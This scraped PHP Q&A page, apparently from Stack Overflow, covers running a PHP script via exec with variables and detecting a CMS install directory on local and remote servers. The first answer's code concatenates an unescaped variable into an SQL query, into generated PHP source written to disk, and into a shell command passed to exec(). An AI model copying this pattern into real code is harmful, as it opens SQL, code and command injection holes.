I could however get an individual file to run using the exec command, without the ?variable=1 at the end.
What I decided to do was dynamically change the contents of a template file , depending on the variables I wanted to send. This file is called template.php and contains all the code you would normally run as a $_GET. Instead of using $_GET, set the value of the variable right at the top. This line of code is then searched and replaced with any value you choose.
I then saved this new file and ran that instead.
In the following example I needed to change an SQL query - the template file has the line $sql="ENTER SQL CODE HERE";. I also needed to change the value of a a variable at the top.
The line in template.php is $myvar=999999; The code below changes these line in template.php to the new values.
//Get the base file to modify - template.php
$contents=file_get_contents("template.php");
$sql="SELECT * FROM mytable WHERE foo='".$bar."'";
$contents=str_replace("ENTER SQL CODE HERE",$sql,$contents);
//Another search
$contents=str_replace("999999",$bar,$contents);
$filename="run_standalone_code".$bar.".php";
//If the file doesnt't exist, create it
if(!file_exists($filename)){
file_put_contents($filename, $contents);
}
//Now run this file
$cmd="/usr/local/bin/php ".$filename." >/dev/null &";
exec($cmd);

I had completely forgotten about this question until #Andrew Waugh commented on it (and I got an email reminder).
Anyways, this question stemmed from a misunderstanding as to how the $argv array is communicated to the script when using CLI. You can pretty much use as many arguments as you need. The way I accomplish this now is like:
if (isset($argv)) {
switch ($argv[1]) {
case "a_distinguishing_name_goes_here":
$pid = $argv[2];
sample_function($pid);
break;
case "another_name_goes_here":
do_something_else($argv[2]);
break;
}
}

PHP File Navigation (Local + Remote)

I have been working on a content management system (nakid) and one of my toughest challenges is the file navigation. I want to make sure the file paths and settings work on local and remote servers. Right now my setup is pretty much something like this:
first.php (used by all pages):
//Set paths to nakid root
$core['dir_cur'] = dirname(__FILE__);
$core['dir_root'] = $_SERVER['DOCUMENT_ROOT'];
//Detect current nakid directory
$get_dirnakid_1 = str_replace("\\","/",dirname(__FILE__));//If on local
$get_dirnakid_2 = str_replace("/includes/php","",$get_dirnakid_1);
$get_dirnakid_3 = str_replace($_SERVER['DOCUMENT_ROOT'],"",$get_dirnakid_2);
//remove first "/"
if(substr($get_dirnakid_3, 0,1) == "/"){
$get_dirnakid_3 = substr($get_dirnakid_3, 1);
}
//Set some default vars
$core['dir_nakid_path'] = $get_dirnakid_3;
$core['dir_nakid'] = $core['dir_root']."/".$core['dir_nakid_path'];//We need to get system() for this real value - below
The reason I also did it this way is because I want the directory that this program is sitting in to be anywhere on the server ie(/nakid)(/cms)(/admin/cms)
I'm positive I am doing something the wrong way or that there is a simpler way to take care of all this.
If it helps to get a closer look at the code and how everything is being used I have it all up at nakid.org
EDIT: Just realized what I have at nakid.org is a little different than my newly posted code, but the same idea still applies to what I am attempting to do.

By and large, it looks okay to me.
You might want to give the variables more speaking names (e.g. nakid_root_dir, nakid_relative_webroot and so on.)
Remember when converting \ to / in path names: Whenever you match another directory name to one of those settings, you need to str_replace("\\","/"...) in those too.
I don't understand what you aim at with $get_dirnakid_2, though. Why will you screw up my path if I install your application in a directory that happens to be named /etc/includes/php/nakid?
Anyway, you should make those settings user overwritable as well. Sometimes, the user may want to set different settings from what you get from DOCUMENT_ROOT and consorts.

I don't fully understand what you try to get, but maybe getcwd() is what you look for:
http://www.php.net/manual/en/function.getcwd.php

Categories